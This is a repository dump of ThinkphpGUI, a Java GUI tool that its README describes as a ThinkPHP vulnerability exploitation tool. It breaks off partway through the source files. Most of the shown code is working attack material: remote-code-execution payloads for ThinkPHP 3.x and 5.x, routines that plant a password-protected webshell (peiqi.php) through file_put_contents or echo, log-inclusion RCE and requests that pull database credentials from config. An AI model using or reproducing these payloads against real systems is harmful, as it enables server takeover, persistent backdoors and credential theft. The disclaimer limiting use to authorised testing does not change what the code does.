├── README.md └── ThinkphpGUI ├── ThinkphpGUI.iml ├── lib ├── swing-layout-javadoc.zip ├── swing-layout-src.zip └── swing-layout.jar ├── pom.xml └── src └── main └── java ├── App.java ├── exploit ├── tp3.java ├── tp3_log.java ├── tp3_log_rce.java ├── tp50.java ├── tp5010.java ├── tp5022_5129.java ├── tp5023.java ├── tp5024_5130.java ├── tp5_db.java ├── tp5_log.java └── tp6_log.java ├── util ├── BasePayload.java ├── Exp_list.java ├── Module.java ├── Result.java └── Tools.java └── view ├── tp_view.java └── tp_view.jfd /README.md: -------------------------------------------------------------------------------- 1 | # ThinkPHPGUI 2 | 3 | * Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (如果感觉对您有帮助,感觉不错的话,请您给个大大的 ⭐️❗️) 4 | * JFormDesigner可视化编写,没有javafx可视化好用(建议学javafx)。 5 | * 检测不到的payload欢迎提交payload至issues。 6 | 7 | **V1.3** 8 | 9 | 新增:ThinkPHP 6.x 日志泄漏。 10 | 11 | 修复:ThinkPHP 3.x,5.x日志泄漏识别准确度。 12 | 13 | **V1.2** 14 | 15 | 新增:刚爆出的 ThinkPHP 3.x 日志包含RCE,getshell,命令执行 16 | 17 | 截屏2021-07-22 上午12 45 51 18 | 19 | ## 20 | 21 | **V1.1** 22 | 23 | 新增:ThinkPHP5.x,ThinkPHP3.x日志泄露 24 | 25 | 截屏2021-06-27 下午6 34 29 26 | 27 | ## 28 | 29 | 30 | **V1.0** 31 | * 支持版本: 32 | 33 | 截屏2021-06-23 上午2 23 51 34 | 35 | 36 | 1. 检测单个版本漏洞 37 | 检查单个 38 | 39 | ## 40 | 2. 检测多个版本漏洞 41 | 检查多个 42 | 43 | ## 44 | 3. 命令执行 45 | 命令执行 46 | 47 | ## 48 | 4. GetShell 49 | getshell_1 50 | getshell_2 51 | 52 | ## 53 | 5. 批量检查单个版本漏洞 54 | 批量检查单个 55 | 56 | 57 | ## 58 | 6. 批量检测多个版本漏洞 59 | 批量检查多个 60 | 61 | **免责声明** 62 | 63 | ## 64 | 本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 65 | 66 | 67 | 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 68 | 69 | 70 | 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 71 | 72 | 73 | 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。 74 | -------------------------------------------------------------------------------- /ThinkphpGUI/ThinkphpGUI.iml: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /ThinkphpGUI/lib/swing-layout-javadoc.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lotus6/ThinkphpGUI/14f52950b36533a505b32f524a1703b24ffd8a03/ThinkphpGUI/lib/swing-layout-javadoc.zip -------------------------------------------------------------------------------- /ThinkphpGUI/lib/swing-layout-src.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lotus6/ThinkphpGUI/14f52950b36533a505b32f524a1703b24ffd8a03/ThinkphpGUI/lib/swing-layout-src.zip -------------------------------------------------------------------------------- /ThinkphpGUI/lib/swing-layout.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Lotus6/ThinkphpGUI/14f52950b36533a505b32f524a1703b24ffd8a03/ThinkphpGUI/lib/swing-layout.jar -------------------------------------------------------------------------------- /ThinkphpGUI/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 4.0.0 6 | 7 | 8 | com.github.kevinsawicki 9 | http-request 10 | 6.0 11 | 12 | 13 | 14 | org.example 15 | ThinkphpGUI 16 | 1.3-SNAPSHOT 17 | 18 | 19 | jdk-1.8 20 | 21 | true 22 | 1.8 23 | 24 | 25 | 1.8 26 | 1.8 27 | 1.8 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | org.apache.maven.plugins 36 | maven-assembly-plugin 37 | 38 | false 39 | 40 | jar-with-dependencies 41 | 42 | 43 | 44 | App 45 | 46 | 47 | 48 | 49 | 50 | make-assembly 51 | package 52 | 53 | assembly 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/App.java: -------------------------------------------------------------------------------- 1 | import view.tp_view; 2 | 3 | import javax.swing.*; 4 | 5 | /** 6 | * Author 莲花 2021/6/15 7 | */ 8 | public class App { 9 | public static void main(String[] args) throws Exception { 10 | tp_view f = new tp_view(); 11 | f.setLocationRelativeTo(null); 12 | f.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); 13 | f.setVisible(true); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp3.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Module; 6 | import util.Result; 7 | 8 | /** 9 | * Author 莲花 2021/6/20 10 | */ 11 | //thinkphp3.0 12 | public class tp3 implements BasePayload { 13 | @Override 14 | public Result checkVUL(String url) throws Exception { 15 | String CheckStr = "PHP Version"; 16 | Module m = new Module(); 17 | String module = m.getModule(url); 18 | String payload = url + "/?s=" + module + "/\\think\\module/action/param1/${@phpinfo()}"; 19 | try { 20 | HttpRequest req = HttpRequest.get(url); 21 | if (req.body().contains(CheckStr)) { 22 | return new Result(true, "ThinkPHP 3.x RCE", payload); 23 | } 24 | } catch (Exception e) { 25 | e.printStackTrace(); 26 | } 27 | return new Result(false, "ThinkPHP 3.x RCE", ""); 28 | } 29 | 30 | @Override 31 | public Result exeVUL(String url, String cmd) throws Exception { 32 | Module m = new Module(); 33 | String module = m.getModule(url); 34 | String payload_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${system($_GET['x'])}}?x=" + cmd; 35 | try { 36 | String res = HttpRequest.get(payload_url).body(); 37 | return new Result(true, null, res); 38 | } catch ( 39 | Exception e) { 40 | e.printStackTrace(); 41 | } 42 | return new Result(false, null, null); 43 | } 44 | 45 | @Override 46 | public Result getShell(String url) throws Exception { 47 | try { 48 | Module m = new Module(); 49 | String module = m.getModule(url); 50 | String shell_url = url + "/?s=" + module + "/\\think\\module/action/param1/{${eval($_POST['peiqi'])}}"; 51 | int code = HttpRequest.get(shell_url).code(); 52 | if (code == 200) { 53 | return new Result(true, null, shell_url); 54 | } 55 | } catch (Exception e) { 56 | e.printStackTrace(); 57 | } 58 | return new Result(false, null, null); 59 | } 60 | } 61 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp3_log.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Result; 6 | 7 | import java.util.ArrayList; 8 | import java.util.Date; 9 | 10 | /** 11 | * Author 莲花 2021/6/27 12 | */ 13 | public class tp3_log implements BasePayload { 14 | @Override 15 | public Result checkVUL(String url) throws Exception { 16 | String CheckStr = "INFO:"; 17 | String CheckErr = "[ error ]"; 18 | Date dt = new Date(); 19 | String year = String.format("%tY", dt); 20 | String mon = String.format("%tm", dt); 21 | String day = String.format("%td", dt); 22 | String sjc = String.valueOf(dt.getTime()).substring(0, 10); 23 | String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log"; 24 | String suffix2 = sjc + "-" + year.substring(2, 4) + "_" + mon + "_" + day + ".log"; 25 | ArrayList payload_urls = new ArrayList() {{ 26 | add(url + "/Runtime/Logs/" + suffix1); 27 | add(url + "/Runtime/Logs/" + suffix2); 28 | 29 | add(url + "/Runtime/Logs/Home/" + suffix1); 30 | add(url + "/Runtime/Logs/Home/" + suffix2); 31 | 32 | add(url + "/Runtime/Logs/Common/" + suffix1); 33 | add(url + "/Runtime/Logs/Common/" + suffix2); 34 | 35 | add(url + "/App/Runtime/Logs/" + suffix1); 36 | add(url + "/App/Runtime/Logs/" + suffix2); 37 | 38 | add(url + "/App/Runtime/Logs/Home/" + suffix1); 39 | add(url + "/App/Runtime/Logs/Home/" + suffix2); 40 | 41 | add(url + "/Application/Runtime/Logs/" + suffix1); 42 | add(url + "/Application/Runtime/Logs/" + suffix2); 43 | 44 | add(url + "/Application/Runtime/Logs/Admin/" + suffix1); 45 | add(url + "/Application/Runtime/Logs/Admin/" + suffix2); 46 | 47 | add(url + "/Application/Runtime/Logs/Home/" + suffix1); 48 | add(url + "/Application/Runtime/Logs/Home/" + suffix2); 49 | 50 | add(url + "/Application/Runtime/Logs/App/" + suffix1); 51 | add(url + "/Application/Runtime/Logs/App/" + suffix2); 52 | 53 | add(url + "/Application/Runtime/Logs/Ext/" + suffix1); 54 | add(url + "/Application/Runtime/Logs/Ext/" + suffix2); 55 | 56 | add(url + "/Application/Runtime/Logs/Api/" + suffix1); 57 | add(url + "/Application/Runtime/Logs/Api/" + suffix2); 58 | 59 | add(url + "/Application/Runtime/Logs/Test/" + suffix1); 60 | add(url + "/Application/Runtime/Logs/Test/" + suffix2); 61 | 62 | add(url + "/Application/Runtime/Logs/Common/" + suffix1); 63 | add(url + "/Application/Runtime/Logs/Common/" + suffix2); 64 | 65 | add(url + "/Application/Runtime/Logs/Service/" + suffix1); 66 | add(url + "/Application/Runtime/Logs/Service/" + suffix2); 67 | }}; 68 | try { 69 | for (String payload_url : payload_urls) { 70 | String res = HttpRequest.get(payload_url).body(); 71 | if (res.contains(CheckStr)||res.contains(CheckErr)) { 72 | return new Result(true, "ThinkPHP 3.x 日志泄露", payload_url); 73 | } 74 | } 75 | 76 | } catch (Exception e) { 77 | e.printStackTrace(); 78 | } 79 | 80 | return new Result(false, "ThinkPHP 3.x 日志泄露", ""); 81 | } 82 | 83 | @Override 84 | public Result exeVUL(String url, String cmd) throws Exception { 85 | return new Result(false, "", ""); 86 | } 87 | 88 | @Override 89 | public Result getShell(String url) throws Exception { 90 | return new Result(false, "", ""); 91 | } 92 | } 93 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp3_log_rce.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Result; 6 | 7 | import java.util.ArrayList; 8 | import java.util.Date; 9 | 10 | /** 11 | * Author 莲花 2021/7/21 12 | */ 13 | public class tp3_log_rce implements BasePayload { 14 | Date dt = new Date(); 15 | String year = String.format("%tY", dt); 16 | String mon = String.format("%tm", dt); 17 | String day = String.format("%td", dt); 18 | String suffix1 = year.substring(2, 4) + "_" + mon + "_" + day + ".log"; 19 | 20 | @Override 21 | public Result checkVUL(String url) throws Exception { 22 | String CheckStr = "PHP Version"; 23 | 24 | String payload_log = url + "?m=Home&c=Index&a=index&test=-->"; 25 | ArrayList log_rces = new ArrayList() {{ 26 | add(url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 27 | add(url + "/?m=Home&c=Index&a=index&info[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 28 | add(url + "/?m=Home&c=Index&a=index¶m[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 29 | add(url + "/?m=Home&c=Index&a=index&name[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 30 | add(url + "/?m=Home&c=Index&a=index&array[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 31 | add(url + "/?m=Home&c=Index&a=index&arr[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 32 | add(url + "/?m=Home&c=Index&a=index&list[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 33 | add(url + "/?m=Home&c=Index&a=index&page[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 34 | add(url + "/?m=Home&c=Index&a=index&menus[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 35 | add(url + "/?m=Home&c=Index&a=index&var[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 36 | add(url + "/?m=Home&c=Index&a=index&data[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 37 | add(url + "/?m=Home&c=Index&a=index&module[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1); 38 | }}; 39 | for (String log_rce : log_rces) { 40 | try { 41 | String log = HttpRequest.get(payload_log).body(); 42 | String res = HttpRequest.get(log_rce).body(); 43 | if (res.contains(CheckStr)) { 44 | return new Result(true, "ThinkPHP 3.x Log RCE", log_rce); 45 | } 46 | } catch (Exception e) { 47 | e.printStackTrace(); 48 | } 49 | } 50 | return new Result(false, "ThinkPHP 3.x Log RCE", ""); 51 | } 52 | 53 | @Override 54 | public Result exeVUL(String url, String cmd) throws Exception { 55 | String log_exe = url + "/?m=Home&c=Index&a=index&test=-->"; 56 | String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1; 57 | try { 58 | String log = HttpRequest.get(log_exe).body(); 59 | int code = HttpRequest.get(log_res).code(); 60 | if (code == 200) { 61 | return new Result(true, null, log_res); 62 | } 63 | } 64 | catch (Exception e) { 65 | e.printStackTrace(); 66 | } 67 | return new Result(false, null, ""); 68 | } 69 | 70 | @Override 71 | public Result getShell(String url) throws Exception { 72 | String log_shell = url + "/?m=Home&c=Index&a=index&test=-->"; 73 | String log_res = url + "/?m=Home&c=Index&a=index&value[_filename]=." + "/Application/Runtime/Logs/Home/" + suffix1; 74 | try { 75 | String log = HttpRequest.get(log_shell).body(); 76 | int code = HttpRequest.get(log_res).code(); 77 | if (code == 200) { 78 | return new Result(true, null, log_res+" Pass:peiqi"); 79 | } 80 | } 81 | catch (Exception e) { 82 | e.printStackTrace(); 83 | } 84 | return null; 85 | } 86 | 87 | } 88 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp50.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Module; 6 | import util.Result; 7 | 8 | import java.util.ArrayList; 9 | 10 | /** 11 | * Author 莲花 2021/6/20 12 | */ 13 | public class tp50 implements BasePayload { 14 | @Override 15 | public Result checkVUL(String url) throws Exception { 16 | String CheckStr = "PHP Version"; 17 | Module m = new Module(); 18 | String module = m.getModule(url); 19 | ArrayList payload_urls = new ArrayList() {{ 20 | add(url + "/?s=/" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1"); 21 | add(url + "/?s=/" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()"); 22 | }}; 23 | 24 | for (String payload_url : payload_urls) { 25 | try { 26 | HttpRequest req1 = HttpRequest.get(payload_url); 27 | if (req1.body().contains(CheckStr)) { 28 | return new Result(true, "ThinkPHP 5.0 RCE", payload_url); 29 | } 30 | } catch (Exception e) { 31 | e.printStackTrace(); 32 | } 33 | } 34 | return new Result(false, "ThinkPHP 5.0 RCE", ""); 35 | } 36 | 37 | @Override 38 | public Result exeVUL(String url, String cmd) throws Exception { 39 | Module m = new Module(); 40 | String module = m.getModule(url); 41 | try { 42 | String payload_url = url + "/?s=" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=" + cmd; 43 | HttpRequest req = HttpRequest.get(payload_url); 44 | String res = req.body(); 45 | return new Result(true, null, res); 46 | } catch (Exception e) { 47 | e.printStackTrace(); 48 | } 49 | return new Result(false, null, ""); 50 | } 51 | 52 | @Override 53 | public Result getShell(String url) throws Exception { 54 | Module m = new Module(); 55 | String module = m.getModule(url); 56 | try { 57 | String payload_url = url + "/?s=" + module + "/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '' >>peiqi.php"; 58 | int get = HttpRequest.get(payload_url).code(); 59 | int code = HttpRequest.get(url + "/peiqi.php").code(); 60 | if (code == 200) { 61 | return new Result(true, null, url + "/peiqi.php Pass:peiqi"); 62 | } 63 | } catch (Exception e) { 64 | e.printStackTrace(); 65 | } 66 | return new Result(false, null, null); 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp5010.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Module; 6 | import util.Result; 7 | 8 | import java.util.ArrayList; 9 | 10 | /** 11 | * Author 莲花 2021/6/15 12 | */ 13 | //ThinkPHP <= 5.0.13 14 | public class tp5010 implements BasePayload { 15 | 16 | public Result checkVUL(String url) { 17 | String CheckStr = "PHP Version"; 18 | Module m = new Module(); 19 | String module = m.getModule(url); 20 | String payload_url = url + "/?s=" + module; 21 | 22 | ArrayList payloads = new ArrayList() {{ 23 | add("_method=__construct&method=get&filter[]=phpinfo&get[]=-1"); 24 | add("s=-1&_method=__construct&method=get&filter[]=phpinfo"); 25 | }}; 26 | 27 | for (String payload : payloads) { 28 | try { 29 | HttpRequest req = HttpRequest.post(payload_url).send(payload); 30 | if (req.body().contains(CheckStr)) { 31 | return new Result(true, "ThinkPHP 5.0.10 construct RCE", payload_url + " Post: " + payload); 32 | } 33 | } catch (Exception e) { 34 | e.printStackTrace(); 35 | } 36 | } 37 | return new Result(false, "ThinkPHP 5.0.10 construct RCE", ""); 38 | } 39 | 40 | public Result exeVUL(String url, String cmd) throws Exception { 41 | Module m = new Module(); 42 | String module = m.getModule(url); 43 | String payload_url = url + "/?s=" + module; 44 | String payload_rce = "s=" + cmd + "&_method=__construct&method&filter[]=system"; 45 | try { 46 | String response = HttpRequest.post(payload_url).send(payload_rce).body(); 47 | String res = response.substring(0, response.indexOf("<")); 48 | if (res.equals("")) { 49 | return new Result(true, "", response); 50 | } 51 | return new Result(true, "", res); 52 | } catch (Exception e) { 53 | e.printStackTrace(); 54 | } 55 | return new Result(false, null, null); 56 | } 57 | 58 | 59 | public Result getShell(String url) throws Exception { 60 | Module m = new Module(); 61 | String module = m.getModule(url); 62 | String payload_url = url + "/?s=" + module; 63 | 64 | ArrayList payloads = new ArrayList() {{ 65 | add("_method=__construct&filter[]=system&mytest=echo '' >>peiqi.php"); 66 | add("_method=__construct&method=get&filter[]=assert&get[]=file_put_contents('./peiqi.php','');"); 67 | add("_method=__construct&method=get&filter[]=assert&get[]=/*1111*//***/file_put_contents/*1**/(/***/'./peiqi.php',/***/''/***/);');"); 68 | add("s=file_put_contents('./peiqi.php','');&_method=__construct&method=&filter[]=assert"); 69 | add("_method=__construct&method=get&filter[]=assert&get[]=copy('', './peiqi.php');"); 70 | }}; 71 | for (String payload : payloads) { 72 | try { 73 | String res = HttpRequest.post(payload_url).send(payload).body(); 74 | int code = HttpRequest.get(url + "/peiqi.php").code(); 75 | if (code == 200) { 76 | return new Result(true, "", url + "/peiqi.php Pass:peiqi"); 77 | } 78 | } catch (Exception e) { 79 | e.printStackTrace(); 80 | } 81 | } 82 | return new Result(false, null, null); 83 | } 84 | 85 | } 86 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp5022_5129.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Module; 6 | import util.Result; 7 | 8 | import java.util.ArrayList; 9 | 10 | /** 11 | * Author 莲花 2021/6/17 12 | */ 13 | //v5.0.23及v5.1.31以下版本 14 | public class tp5022_5129 implements BasePayload { 15 | @Override 16 | public Result checkVUL(String url) throws Exception { 17 | String CheckStr = "PHP Version"; 18 | Module m = new Module(); 19 | String module = m.getModule(url); 20 | ArrayList payload_urls = new ArrayList() {{ 21 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1"); 22 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()"); 23 | add(url + "/?s=/" + module + "/\\think\\view\\driver\\php/display&content="); 24 | }}; 25 | for (String payload_url : payload_urls) { 26 | try { 27 | HttpRequest req1 = HttpRequest.get(payload_url); 28 | if (req1.body().contains(CheckStr)) { 29 | return new Result(true, "ThinkPHP 5.0.22/5.1.29 RCE", payload_url); 30 | } 31 | } catch (Exception e) { 32 | e.printStackTrace(); 33 | } 34 | } 35 | return new Result(false, "ThinkPHP 5.0.22/5.1.29 RCE", ""); 36 | } 37 | 38 | public Result exeVUL(String url, String cmd) throws Exception { 39 | Module m = new Module(); 40 | String module = m.getModule(url); 41 | try { 42 | String payload_url = url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=" + cmd; 43 | String res = HttpRequest.get(payload_url).body(); 44 | return new Result(true, null, res); 45 | } catch (Exception e) { 46 | e.printStackTrace(); 47 | } 48 | return new Result(false, null, null); 49 | } 50 | 51 | public Result getShell(String url) throws Exception { 52 | Module m = new Module(); 53 | String module = m.getModule(url); 54 | 55 | ArrayList payload_urls = new ArrayList() {{ 56 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][]="); 57 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=peiqi.php&vars[1][1]=/***/')/**/;/**/?>"); 58 | add(url + "/?s=/" + module + "/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=copy&vars[1][0]=''&vars[1][1]=peiqi.php"); 59 | add(url + "/?s=/" + module + "/\\think\\template\\driver\\file/write&cacheFile=peiqi.php&content="); 60 | }}; 61 | for (String payload_url : payload_urls) { 62 | try { 63 | String res = HttpRequest.get(payload_url).body(); 64 | int code = HttpRequest.get(url + "/peiqi.php").code(); 65 | if (code == 200) { 66 | return new Result(true, null, url + "/peiqi.php Pass:peiqi"); 67 | } 68 | } catch (Exception e) { 69 | e.printStackTrace(); 70 | } 71 | } 72 | return new Result(false, null, null); 73 | } 74 | } 75 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp5023.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Result; 6 | 7 | import java.util.ArrayList; 8 | 9 | //ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha 10 | public class tp5023 implements BasePayload { 11 | 12 | @Override 13 | public Result checkVUL(String url) throws Exception { 14 | String CheckStr = "PHP Version"; 15 | 16 | String payload_url = url + "/?s=captcha&test=-1"; 17 | ArrayList payloads = new ArrayList() {{ 18 | add("_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1"); 19 | add("_method=__ConStruct&method=get&filter[]=call_user_func&get[0]=phpinfo"); 20 | add("_method=__construct&filter[]=phpinfo&method=GET&get[]=1"); 21 | }}; 22 | for (String payload : payloads) { 23 | try { 24 | HttpRequest req = HttpRequest.post(payload_url).send(payload); 25 | if (req.body().contains(CheckStr)) { 26 | return new Result(true, "ThinkPHP 5.0.23 RCE", payload_url + " Post: " + payload); 27 | } 28 | } catch (Exception e) { 29 | e.printStackTrace(); 30 | } 31 | } 32 | 33 | return new Result(false, "ThinkPHP 5.0.23 RCE", ""); 34 | } 35 | 36 | public Result exeVUL(String url, String cmd) throws Exception { 37 | String payload_url = url + "/?s=captcha&test=-1"; 38 | ArrayList payloads = new ArrayList() {{ 39 | add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=" + cmd); 40 | add("s=" + cmd + "&_method=__construct&method=get&filter[]=system"); 41 | add("s=" + cmd + "&_method=__construct&method&filter[]=system"); 42 | }}; 43 | for (String payload : payloads) { 44 | try { 45 | String response = HttpRequest.post(payload_url).send(payload).body(); 46 | String res = response.substring(0, response.indexOf("<")); 47 | if (res.equals("")) { 48 | return new Result(true, "", response); 49 | } 50 | return new Result(true, "", res); 51 | } catch (Exception e) { 52 | e.printStackTrace(); 53 | } 54 | } 55 | return new Result(false, null, null); 56 | } 57 | 58 | @Override 59 | public Result getShell(String url) throws Exception { 60 | String payload_url = url + "/?s=captcha&test=-1"; 61 | ArrayList payloads = new ArrayList() {{ 62 | add("_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '' >>peiqi.php"); 63 | add("_method=__construct&filter[]=system&method=GET&get[]=echo '' >>peiqi.php"); 64 | add("_method=__construct&filter[]=assert&method=GET&get[]=file_put_contents('./peiqi.php','');"); 65 | add("_method=__construct&filter[]=assert&method=GET&get[]=copy('', './peiqi.php');"); 66 | }}; 67 | 68 | for (int i = 0; i < payloads.size(); i++) { 69 | try { 70 | String res = HttpRequest.post(payload_url).send(payloads.get(i)).body(); 71 | int code = HttpRequest.get(url + "/peiqi.php").code(); 72 | if (code == 200) { 73 | return new Result(true, null, url + "/peiqi.php Pass:peiqi"); 74 | } 75 | } catch (Exception e) { 76 | e.printStackTrace(); 77 | } 78 | } 79 | return new Result(false, null, null); 80 | } 81 | } 82 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp5024_5130.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Module; 6 | import util.Result; 7 | 8 | import java.util.ArrayList; 9 | 10 | /** 11 | * Author 莲花 2021/6/18 12 | */ 13 | //ThinkPHP 5.0.22 TO 5.1.29 RCE,5.1.18测试成功 14 | public class tp5024_5130 implements BasePayload { 15 | @Override 16 | public Result checkVUL(String url) throws Exception { 17 | String CheckStr = "PHP Version"; 18 | Module m = new Module(); 19 | String module = m.getModule(url); 20 | ArrayList payload_urls = new ArrayList() {{ 21 | add(url + "/?s=" + module + "/\\think\\Request/input&filter[]=phpinfo&data=-1"); 22 | add(url + "/?s=/" + module + "/\\think\\request/input?data[]=phpinfo()&filter=assert"); 23 | }}; 24 | for (String payload_url : payload_urls) { 25 | try { 26 | HttpRequest req1 = HttpRequest.get(payload_url); 27 | if (req1.body().contains(CheckStr)) { 28 | return new Result(true, "ThinkPHP 5.0.24-5.1.30 RCE", payload_url); 29 | } 30 | } catch (Exception e) { 31 | e.printStackTrace(); 32 | } 33 | } 34 | return new Result(false, "ThinkPHP 5.0.24-5.1.30 RCE", ""); 35 | } 36 | 37 | @Override 38 | public Result exeVUL(String url, String cmd) throws Exception { 39 | Module m = new Module(); 40 | String module = m.getModule(url); 41 | try { 42 | String payload_url = url + "/?s=" + module + "/\\think\\Request/input&filter=system&data=" + cmd; 43 | HttpRequest req = HttpRequest.get(payload_url); 44 | String res = req.body(); 45 | return new Result(true, null, res); 46 | } catch (Exception e) { 47 | e.printStackTrace(); 48 | } 49 | return new Result(false, null, null); 50 | } 51 | 52 | @Override 53 | public Result getShell(String url) throws Exception { 54 | Module m = new Module(); 55 | String module = m.getModule(url); 56 | try { 57 | String payload_url = url + "/?s=" + module + "/\\think\\Request/input&filter=system&data=echo '' >>peiqi.php"; 58 | int get = HttpRequest.get(payload_url).code(); 59 | int code = HttpRequest.get(url + "/peiqi.php").code(); 60 | if (code == 200) { 61 | return new Result(true, null, url + "/peiqi.php Pass:peiqi"); 62 | } 63 | } catch (Exception e) { 64 | e.printStackTrace(); 65 | } 66 | return new Result(false, null, null); 67 | } 68 | } 69 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp5_db.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Module; 6 | import util.Result; 7 | 8 | import java.util.ArrayList; 9 | 10 | /** 11 | * Author 莲花 2021/6/20 12 | */ 13 | public class tp5_db implements BasePayload { 14 | @Override 15 | public Result checkVUL(String url) throws Exception { 16 | Module m = new Module(); 17 | String module = m.getModule(url); 18 | ArrayList payload_urls = new ArrayList() {{ 19 | add(url + "/?s=" + module + "/think\\config/get&name=database.username"); 20 | add(url + "/?s=" + module + "/think\\config/get&name=database.hostname"); 21 | add(url + "/?s=" + module + "/think\\config/get&name=database.password"); 22 | add(url + "/?s=" + module + "/think\\config/get&name=database.database"); 23 | }}; 24 | try { 25 | String username = HttpRequest.get(payload_urls.get(0)).body(); 26 | if (username.length() >= 20) { 27 | username = null; 28 | } 29 | String hostname = HttpRequest.get(payload_urls.get(1)).body(); 30 | if (hostname.length() >= 20) { 31 | hostname = null; 32 | } 33 | String password = HttpRequest.get(payload_urls.get(2)).body(); 34 | if (password.length() >= 40) { 35 | password = null; 36 | } 37 | String database = HttpRequest.get(payload_urls.get(3)).body(); 38 | if (database.length() >= 20) { 39 | database = null; 40 | } 41 | if (username == null && hostname == null && password == null && database == null) { 42 | return new Result(false, "ThinkPHP 5.x 数据库信息泄露", ""); 43 | } else { 44 | return new Result(true, "ThinkPHP 5.x 数据库信息泄露", "username:" + username + " hostname:" + hostname + " password:" + password + " database:" + database); 45 | } 46 | } catch (Exception e) { 47 | e.printStackTrace(); 48 | } 49 | return new Result(false, "ThinkPHP 5.x 数据库信息泄露", ""); 50 | } 51 | 52 | @Override 53 | public Result exeVUL(String url, String cmd) throws Exception { 54 | return new Result(false, "", ""); 55 | } 56 | 57 | @Override 58 | public Result getShell(String url) throws Exception { 59 | return new Result(false, "", ""); 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /ThinkphpGUI/src/main/java/exploit/tp5_log.java: -------------------------------------------------------------------------------- 1 | package exploit; 2 | 3 | import com.github.kevinsawicki.http.HttpRequest; 4 | import util.BasePayload; 5 | import util.Result; 6 | 7 | import java.util.ArrayList; 8 | import java.util.Date; 9 | 10 | /** 11 | * 